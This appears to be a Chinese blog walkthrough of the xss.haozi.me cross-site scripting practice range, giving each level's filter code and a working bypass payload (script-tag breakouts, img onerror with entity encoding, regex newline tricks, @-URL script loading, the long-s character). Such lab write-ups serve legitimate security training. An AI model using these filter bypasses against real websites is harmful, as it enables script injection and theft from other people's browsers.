XSS简单在线靶场

最新推荐文章于 2025-06-19 17:32:27 发布
原创 最新推荐文章于 2025-06-19 17:32:27 发布 · 805 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#xss #前端 #web安全 #php

XSS简单在线靶场

在这里插入图片描述

靶场里的题以绕过为主,我们的目的是绕过防护执行alert(1),只要能执行alert(1),页面就会显示通过,同时左侧对应的当前关卡也会打上对钩。

项目:https://github.com/haozi/xss-demo

在线地址:https://xss.haozi.me

在线网站目录下的包含alert(1)的js文件地址:https://xss.haozi.me/j.js

0x00

写一对JS标签,里面直接输入脚本语句

function render (input) {
  return '<div>' + input + '</div>'
}

<script>alert(1)</script>

0x01

闭合</textarea>再输入脚本语句

function render (input) {
  return '<textarea>' + input + '</textarea>'
}

</textarea><script>alert(1)</script>

0x02

闭合">再输入脚本语句

function render (input) {
  return '<input type="name" value="' + input + '">'
}

"><script>alert(1)</script>

0x03

过滤了小括号,可以用用反引号代替小括号

function render (input) {
  const stripBracketsRe = /[()]/g
  input = input.replace(stripBracketsRe, '')
  return input
}

<script>alert`1`</script>

0x04

过滤了小括号和反单引号,用img标签报错触发动作,再将小括号转编码为&#40;1&#41;

function render (input) {
  const stripBracketsRe = /[()`]/g
  input = input.replace(stripBracketsRe, '')
  return input
}

<img src=1 onerror="alert&#40;1&#41"

0x05

语句输出在html注释里,并将结束注释符-->变成😂,可以采用另一种闭合方式--!>

function render (input) {
  input = input.replace(/-->/g, '😂')
  return '<!-- ' + input + ' -->'
}

--!><script>alert(1)</script>

0x06

输出在input标签里,并将许多关键字和字符替换成了_。正则中.*不包括换行符

function render (input) {
  input = input.replace(/auto|on.*=|>/ig, '_')
  return `<input value=1 ${input} type="text">`
}
#payload
type="image" src=1 onerror
=alert(1)

0x07

过滤闭合的<>,插入报错图片

function render (input) {
  const stripTagsRe = /<\/?[^>]+>/gi

  input = input.replace(stripTagsRe, '')
  return `<article>${input}</article>`
}

<img src=1 onerror="alert&#40;1&#41"

0x08

插入在css样式表里,回车绕过正则

function render (src) {
  src = src.replace(/<\/style>/ig, '/* \u574F\u4EBA */')
  return `
    <style>
      ${src}
    </style>
  `
}
#payload
</style
><script>alert(1)</script>

0x09

输入正则中的网址,闭合JS标签,写入攻击语句

function render (input) {
  let domainRe = /^https?:\/\/www\.segmentfault\.com/
  if (domainRe.test(input)) {
    return `<script src="${input}"></script>`
  }
  return 'Invalid URL'
}

http://www.segmentfault.com"></script><img src=1 onerror="alert(1&#41"

0x0A

将特殊字符转义再输出

function render (input) {
  function escapeHtml(s) {
    return s.replace(/&/g, '&amp;')
            .replace(/'/g, '&#39;')
            .replace(/"/g, '&quot;')
            .replace(/</g, '&lt;')
            .replace(/>/g, '&gt;')
            .replace(/\//g, '&#x2f')
  }

  const domainRe = /^https?:\/\/www\.segmentfault\.com/
  if (domainRe.test(input)) {
    return `<script src="${escapeHtml(input)}"></script>`
  }
  return 'Invalid URL'
}

@重定向超链接:

https://www.segmentfault.com@xss.haozi.me/j.js

或者使用网站自带的JS链接文件:

https://www.segmentfault.com.haozi.me/j.js

0x0B

将字符转换成大写了

function render (input) {
  input = input.toUpperCase()
  return `<h1>${input}</h1>`
}

<svg onload=&#97&#108&#101&#114&#116(1)>

<img src=1 onerror=&#97;&#108;&#101;&#114;&#116;&#40;1&#41;>

0x0C

function render (input) {
  input = input.replace(/script/ig, '')
  input = input.toUpperCase()
  return '<h1>' + input + '</h1>'
}

svg标签或img标签

<svg onload=&#97&#108&#101&#114&#116(1)>

<img src=1 onerror=&#97;&#108;&#101;&#114;&#116;&#40;1&#41;>

双写重定向:

<scrscriptipt src="https://www.segmentfault.com.haozi.me/j.js"></scrscriptipt>

0x0D

这一关,我表示不理解,不知道为什么—>能注释掉后面的括号//却不行

function render (input) {
  input = input.replace(/[</"']/g, '')
  return `
    <script>
          // alert('${input}')
    </script>
  `
}
//payload

alert(1)
-->

0x0E

function render (input) {
  input = input.replace(/<([a-zA-Z])/g, '<_$1')
  input = input.toUpperCase()
  return '<h1>' + input + '</h1>'
}

ſ字符,是古英语中s的写法,在网页里可以匹配s,但在正则中却不属于[a-z]范围,这样就可以绕过正则使用<script>标签

<ſcript src="https://www.segmentfault.com.haozi.me/j.js"></script>

0x0F

function render (input) {
  function escapeHtml(s) {
    return s.replace(/&/g, '&amp;')
            .replace(/'/g, '&#39;')
            .replace(/"/g, '&quot;')
            .replace(/</g, '&lt;')
            .replace(/>/g, '&gt;')
            .replace(/\//g, '&#x2f;')
  }
  return `<img src οnerrοr="console.error('${escapeHtml(input)}')">`
}

虽然转义了,但在html是可以解析的,等于无效转义

');alert('1

0x10

function render (input) {
  return `
<script>
  window.data = ${input}
</script>
  `
}

'';alert(1);

0x11

",替换成\\",直接输出转义作用在中间的\上,变成\"

// from alf.nu
function render (s) {
  function escapeJs (s) {
    return String(s)
            .replace(/\\/g, '\\\\')
            .replace(/'/g, '\\\'')
            .replace(/"/g, '\\"')
            .replace(/`/g, '\\`')
            .replace(/</g, '\\74')
            .replace(/>/g, '\\76')
            .replace(/\//g, '\\/')
            .replace(/\n/g, '\\n')
            .replace(/\r/g, '\\r')
            .replace(/\t/g, '\\t')
            .replace(/\f/g, '\\f')
            .replace(/\v/g, '\\v')
            // .replace(/\b/g, '\\b')
            .replace(/\0/g, '\\0')
  }
  s = escapeJs(s)
  return `
<script>
  var url = 'javascript:console.log("${s}")'
  var a = document.createElement('a')
  a.href = url
  document.body.appendChild(a)
  a.click()
</script>
`
}

");alert(1)//

0x12

",替换成\\",与上面规则相同,但输出时用了字符串拼接,使得转义后的\"\还具有转义效果

// from alf.nu
function escape (s) {
  s = s.replace(/"/g, '\\"')
  return '<script>console.log("' + s + '");</script>'
}

在前面再填一个\

\");alert(1)//

J1yabe
关注
XSS线上靶场---Warmups
qq_52016943的博客
08-01 2639
XSS线上靶场
XSS线上靶场---haozi
qq_52016943的博客
07-29 1444
XSS 在线靶场
xss靶场在线靶场
小白的博客
09-09 1046
xss靶场在线靶场
渗透测试中新手必练的15个靶场,(非常详细)零基础入门到精通,收藏这篇就够了
最新发布
Libra1313的博客
06-19 1001
相信很多小伙伴们在学习渗透测试的时候,不知道如何开始,那么这下面15个靶场对你的学习将会有很大的帮助!
XSS线上靶场---prompt
qq_52016943的博客
07-30 1234
XSS prompt
XSS Game靶场练习
qq_64338246的博客
08-17 1217
虽然这里又用了innerHTML,但是过滤了括号会导致无法触发函数,所以不能像第一关那样直接用img标签。这里用双引号闭合,让jeff=aaa正常执行(aaa可以换成别的),然后在后面继续执行弹出1337的命令。用location把编码的符号变成字符串,然后再用括号的替代品如%2528和%2529来进行绕过。实际操作时可以看到,网页在加载完成后,经过两秒会再加载一次,这里就是在进行submit的提交。这一关依旧是get传参,只是多了一个submit提交事件,配合定时器在两秒后自动提交。
XSSxss-labs靶场通关
qq_62987084的博客
09-22 1124
xss-labs靶场通关详解
网络安全XSS靶场
huizhaohaha的博客
08-18 1502
可以看到,我们通过url传递参数,传递了两个,一个src =1,一个onerror,最后保留下来了onerror参数,那这是什么原理呢,我们可以根据这个进行猜测,那就是,在这个循环删除完第一个参数的时候,指针网第二个参数走,但是由于,第一个参数没有数据了,我的传递的第二个参数向前走了一步,也就是到达了第一个参数的位置,而现在指针指的位置为空了,删不删的无所谓了,那么依据我们的分析,我们传递的参数可以保留偶数的参数,奇数参数都将会被删除,那么我们可以试一试看看我们的猜测是否正确。
xss-labs靶场通关详解 XSS (Cross Site Scripting) 攻击是一种常见的网络攻击类型,它允许攻击者在受害者的浏览器中执行恶意脚本
04-17
为了帮助开发人员更好地理解和防御这种攻击,有许多在线靶场XSS-Labs提供了一系列的挑战来模拟各种类型的XSS漏洞。 虽然我无法直接访问XSS-Labs靶场的具体内容,我可以为你提供一个通用的指南来通关这类XSS靶场。...
xss-labs靶场
newlife1441的博客
07-29 1060
靶场搭建,可以从Github上下载或者直接下载下面的资源入门级别的xss-labs靶场,有需要的自行下载搭建,搭建过程可以参考网上的资料-网络安全文档类资源-优快云下载入门级别的xss-labs靶场,适合新入门的学生进行练习,希望你可以从中学习到一些解题的相关技巧和关更多下载资源、学习资料请访问优快云下载频道.https。......
网络安全xss靶场练习
bb_lo的博客
08-18 1372
靶场地址页面显示如下。
WEB渗透学习-XSS-labs靶场
04-20
XSS-labs为WEB渗透中跨站脚本攻击专项练习靶场,内含多种攻击方式,采用关卡制,由易到难,适合刚接触该漏洞的新手巩固练习
WEB常见漏洞之XSS(靶场篇)
One-Fox安全团队的博客
06-30 2380
由于传播、利用本公众号狐狸说安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号狐狸说安全及作者不为承担任何责任,一旦造成后果请自行承担!
XSS靶场
weixin_53860392的博客
03-08 901
1.
Xss.haozi在线练习靶场1-19关(带答案及靶场地址)
2301_78238055的博客
08-22 1072
一个在线XSS练习靶场19关全带通关答案
XSS-labs靶场
Vi_vids的博客
03-10 537
xss-labs靶场 Less-01 对于XSS漏洞,在实战中未避免因关键字被发现,多采用h5标签进行试探。 可以判断存在xss注入; 或者使用另一种payload Less-02
xss.haozi.me靶场详解
m0_46467017的博客
07-28 2814
由于xss.haozi.me是一个在线靶场,服务部署在Github,若网速不好,则需要科学上网。由于本靶场是一个白盒测试的靶场,我们可以看到代码的源码,所以可以直接根据源码的限制的条件来思考如何绕过。...
XSS漏洞:xss.haozi.me靶场通关
qq_68163788的博客
01-18 3234
xss.haozi.me是一个专门用于测试和学习跨站脚本(XSS)漏洞的靶场XSS漏洞是一种常见的Web安全漏洞,攻击者通过在网页中注入恶意脚本,可以获取用户的敏感信息,如Cookie、会话令牌等。 通关xss.haozi.me靶场意味着成功利用了该靶场中的XSS漏洞,并完成了相应的任务。在这个过程中,你需要利用各种XSS漏洞,包括反射型XSS、存储型XSS等,来实现跨站脚本攻击,并获取相应的flag或者完成指定的任务。 通过通关xss.haozi.me靶场,你可以提升自己的Web安全技能,了解XSS
XSS介绍和XSS-Labs靶场
03-29
### XSS攻击的基本概念 跨站脚本攻击(Cross-Site Scripting, XSS)是一种常见的网络安全漏洞,允许攻击者在受害者的浏览器中注入恶意脚本。这种攻击通常利用网页应用对用户输入数据处理不当的缺陷实现。XSS攻击的主要目的是窃取用户的敏感信息,例如Cookie、会话令牌或其他隐私数据[^3]。 #### XSS攻击的工作原理 XSS攻击的核心在于将未经验证或未正确编码的用户输入嵌入到动态生成的HTML页面中。当受害者访问该页面时,嵌入的恶意脚本会在其浏览器环境中执行。根据攻击方式的不同,XSS可分为三种主要类型: 1. **反射型XSS** 攻击者通过诱导用户点击含有恶意脚本的链接,使脚本被服务器反射回客户端并被执行。这种方式依赖于用户交互行为完成攻击过程。 2. **存储型XSS** 当恶意脚本被永久保存在目标数据库中并通过正常请求返回给其他用户时发生。这类攻击影响范围更广,因为一旦脚本存入系统就可能持续危害多个用户。 3. **DOM-based XSS** 此类攻击不涉及服务端逻辑错误,而是由于前端JavaScript代码直接操作了不可信的数据源,并将其渲染至文档对象模型 (Document Object Model),从而触发攻击。 --- ### XSS-Labs靶场练习教程 为了更好地理解和掌握XSS攻击及其防御机制,可以通过实际动手实验加深认识。以下是基于[XSS-Labs](https://github.com/ziyan/xss-labs)靶场的学习指南: #### 靶场环境搭建 按照提供的参考资料[^1][^2],可以找到关于XSS-Labs靶场的具体安装说明和技术支持资料。一般而言,需要具备一定的PHPWeb开发基础才能顺利部署本地测试平台。 - 下载项目仓库文件夹; - 安置好所需的运行环境(如Apache/Nginx Web Server 和 MySQL 数据库管理系统); - 导入初始配置数据集以便启动各个挑战级别实例; #### 实践案例解析 以某级题目为例展示解决思路: 假设存在一个简单的留言板功能,其中提交表单后能够显示留言内容却没有任何防护措施,则可能存在如下风险点——如果有人故意填写类似于`<script>alert('Hacked')</script>`这样的字段值的话就会弹窗警告框告知已被入侵成功! 此时我们需要思考如何绕过现有的过滤规则或者寻找新的突破口来达成最终目的即让上述JS语句生效达到预期效果同时也要注意遵循道德规范仅限用于教育研究用途不得非法滥用技术手段伤害他人利益。 ```html <!-- 原始 HTML 表单 --> <form action="/submit" method="POST"> <input type="text" name="comment" /> <button>Submit</button> </form> <!-- 可能存在的输出位置 --> <div id="comments"> <?php echo $_POST['comment']; ?> </div> ``` 针对此场景可尝试多种payload组合形式比如但不限于以下几种情况之一可能会奏效取决于具体后台实现细节差异等因素影响: ```javascript // Payload Example 1: Basic Injection <script>alert(1)</script> // Payload Example 2: Bypass Simple Filters with Encoding <script>alert(1)</script> // Payload Example 3: Event Handler Abuse <img src=x onerror=alert(1)> ``` 每完成一道习题都应该回顾总结经验教训进而提升技术水平。 --- ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值